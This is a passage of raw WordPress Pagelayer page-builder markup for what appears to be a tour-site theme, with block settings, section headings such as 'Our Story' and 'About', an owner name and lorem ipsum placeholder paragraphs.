{\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"3ow4083\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"v3i9069\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003ch6\\u003eBest Tour\\u003c\\/h6\\u003e\",\"pagelayer-id\":\"yxl7406\"} --><h6>Best Tour</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eRecently\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"wr43667\"} --><h5>Recently</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch2\\u003eRecently\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"rpu2866\"} --><h2>Recently</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"ftx2686\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"8iu8629\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"zce1846\"} -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"animation_delay\":\"600\",\"pagelayer-id\":\"95a4939\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"xg24789\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"7q27715\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"q7j7673\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"lud7614\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Read More\",\"align\":\"left\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"#efba6cff\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"1,1,1,1\",\"btn_bg_color\":\"\",\"btn_color\":\"#171615ff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"ele_margin_mobile\":\"0em,0em,2em,0em\",\"btn_bg_color_hover\":\"#efba6cff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#fbfbfbff\",\"pagelayer-id\":\"s4o7958\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"rj92421\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"8\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#0986c0\",\"ele_margin_tablet\":\"2em,0em,0em,0em\",\"text\":\"\\n\",\"pagelayer-id\":\"1l88886\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"zbd4245\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"5w53892\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003ch6\\u003eDiscover Story\\u003c\\/h6\\u003e\",\"pagelayer-id\":\"s2y2854\"} --><h6>Discover Story</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eOur Story\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"7hj6278\"} --><h5>Our Story</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"heading_typo_tablet\":\",65,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eOur Story\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"8a83591\"} --><h2>Our Story</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"jbv5145\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"jwc6276\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"wx71564\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"13\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_mobile\":\"0em,0em,3em,0em\",\"ele_margin_tablet\":\"0em,0em,3em,0em\",\"text\":\"\\n\",\"pagelayer-id\":\"fur4139\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"kex7064\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\" \",\"ele_bg_hover_delay\":\"400\",\"heading_typo\":\",19,,600,,,Solid,,Uppercase,,\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003ePaul Volkmer\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"xd56339\"} --><h5>Paul Volkmer</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch3\\u003eOwner\\u003c\\/h3\\u003e\",\"pagelayer-id\":\"41z4865\"} --><h3>Owner</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"erd9657\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"b606974\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"gxr7585\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"sgk9489\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"z8q5386\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Read More\",\"align\":\"left\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"#efba6cff\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"1,1,1,1\",\"btn_bg_color\":\"\",\"btn_color\":\"#171615ff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"ele_margin_mobile\":\"0em,0em,1em,0em\",\"btn_bg_color_hover\":\"#efba6cff\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#ffffffff\",\"pagelayer-id\":\"kom4786\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"y9d5045\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"qyn8669\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003ch6\\u003eAbout\\u003c\\/h6\\u003e\",\"pagelayer-id\":\"zyg4311\"} --><h6>About</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eAbout\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"5g46798\"} --><h5>About</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eAbout\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"ad65610\"} --><h2>About</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"9zn9047\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"1zv7526\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"yzg1330\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003ePaul Volkmer\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"xjd9615\"} --><h5>Paul Volkmer</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch3\\u003eOwner\\u003c\\/h3\\u003e\",\"pagelayer-id\":\"gno1604\"} --><h3>Owner</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"z0o5422\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"6ub7505\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"gre2420\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"w764798\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"34b4400\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text 